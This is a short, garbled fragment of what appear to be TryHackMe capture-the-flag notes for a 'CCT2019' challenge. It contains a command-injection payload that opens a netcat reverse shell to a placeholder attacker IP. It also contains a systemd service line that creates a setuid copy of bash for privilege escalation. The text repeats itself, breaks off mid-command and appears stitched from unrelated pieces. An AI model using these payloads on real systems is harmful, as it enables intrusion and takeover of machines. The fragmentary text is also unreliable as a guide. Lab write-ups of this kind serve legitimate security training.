You should catch a shell as www-data .
127.0.0.1; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> 4444 > /tmp/f cct2019 tryhackme
Recovering the first file in its entirety is mandatory; missing bytes in the initial extraction often makes later stages impossible to solve. CCT2019 - TryHackMe You should catch a shell as www-data
[Service] Type=simple User=mandy ExecStart=/bin/bash -c 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' cat /tmp/f | /bin/sh -i 2>